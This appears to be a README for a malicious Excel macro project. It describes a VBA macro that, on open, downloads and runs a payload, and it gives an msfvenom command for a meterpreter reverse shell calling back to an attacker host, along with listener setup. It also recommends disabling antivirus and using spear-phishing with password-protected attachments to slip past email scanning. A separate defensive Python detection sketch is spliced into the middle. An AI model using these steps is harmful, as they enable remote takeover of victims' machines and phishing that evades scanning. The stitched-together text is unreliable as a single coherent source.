Excel-Malware-Maverick

This project explores how MS Excel can be used to download and execute malware.

The VBA code does the following:

When the Excel workbook is opened:

  1. It checks if Microsoft Excel is already running.
  2. If Excel is not running, it starts a new instance of Excel.
  3. It then downloads the malware (firstStageMal.exe) from the specified URL.
  4. The downloaded file is saved to a temporary location on the user's computer.
  5. Finally, it runs the downloaded exe (firstStageMal.exe) file.

You need to modify the code according to your requirements (URL, malware binary name, etc.).

Open the Macros section of the Excel workbook (Press ALT + F11) and paste the VBA code.

Save as Excel Macro-Enabled Workbook (.xlsm)

Congrats on creating your malicious Excel macro, which downloads the actual malware and executes it when the user opens the Excel document.

For demonstration purposes, you can use msfvenom to create a first-stage malware binary as follows:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.0.8 LPORT=6969 -f exe > firstStageMal.exe

firstStageMal.exe can then be hosted via a Simple HTTP server in Kali.

Remember to establish a listener via msfconsole (exploit/multi/handler), according to your LHOST and LPORT.

On the victim machine, if the victim uses O365, macros must first be enabled via the Trust Center.

After the victim opens the Excel file, it downloads firstStageMal.exe from the HTTP server, executes it, and gives a meterpreter reverse shell to the attacker.
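Seen from the defender's side, the chain above (Excel writes an .exe to a temp location, then launches it) shows up in file-creation and process-creation telemetry. The following detection sketch is an added example, not part of the original project; the event field names and sample events are constructed, loosely modelled on Sysmon event IDs 11 (FileCreate) and 1 (ProcessCreate).

```python
import ntpath  # parses Windows paths on any OS

OFFICE = {"excel.exe"}
TEMP = ("\\appdata\\local\\temp\\", "\\windows\\temp\\")
XL = r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE"
TMP = r"C:\Users\alice\AppData\Local\Temp"

# Constructed sample events (not real telemetry); field names are assumptions.
# id 11 = file created by `image`; id 1 = `image` started by `parent`.
EVENTS = [
    {"id": 11, "t": 100, "host": "WS01", "image": XL, "target": TMP + r"\~DF3A.tmp"},
    {"id": 11, "t": 101, "host": "WS01", "image": XL, "target": TMP + r"\firstStageMal.exe"},
    {"id": 1, "t": 103, "host": "WS01", "parent": XL, "image": TMP + r"\firstStageMal.exe"},
    {"id": 1, "t": 200, "host": "WS02", "parent": r"C:\Windows\explorer.exe", "image": TMP + r"\setup.exe"},
    {"id": 1, "t": 300, "host": "WS03", "parent": XL, "image": TMP + r"\update.exe"},
    {"id": 1, "t": 310, "host": "WS03", "parent": XL, "image": r"C:\Windows\splwow64.exe"},
]

def is_office(path):
    return ntpath.basename(path).lower() in OFFICE

def in_temp(path):
    return any(marker in path.lower() for marker in TEMP)

def detect(events, window=300):
    """Return alerts for executables launched by Excel from a temp directory."""
    dropped = {}  # (host, path) -> time Excel wrote the .exe
    alerts = []
    for ev in sorted(events, key=lambda e: e["t"]):
        if ev["id"] == 11 and is_office(ev["image"]):
            target = ev["target"].lower()
            if in_temp(target) and target.endswith(".exe"):
                dropped[(ev["host"], target)] = ev["t"]
        elif ev["id"] == 1 and is_office(ev["parent"]) and in_temp(ev["image"]):
            wrote = dropped.get((ev["host"], ev["image"].lower()))
            correlated = wrote is not None and ev["t"] - wrote <= window
            alerts.append({
                "host": ev["host"],
                "image": ntpath.basename(ev["image"]),
                # Write-then-run by the same Office process is the stronger signal.
                "severity": "high" if correlated else "medium",
            })
    return alerts

if __name__ == "__main__":
    for alert in detect(EVENTS):
        print(alert)
```

The ordinary `.tmp` write by Excel, the installer started by Explorer, and Excel's own `splwow64.exe` child produce no alert, which keeps the rule narrow enough to run against normal workstation activity.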

NOTE - This code may be detected as malicious by your AV. If you are doing this for demonstration purposes, it is recommended to first disable the AV.

Initial Access Idea - You can use a spear-phishing email to make the user open the Excel file. Google does not scan password-protected Excel attachments. You can send the password in the email body while convincing the user that the email is legitimate.

Disclaimer: This project is intended for educational purposes only. The code provided is meant to demonstrate certain concepts and should not be used for any illegal activities or malicious intent. By accessing and using this code, you agree that I, as the author, will not be held responsible for any misuse or illegal use of the code or its consequences. It is your responsibility to use this code ethically and in accordance with applicable laws and regulations.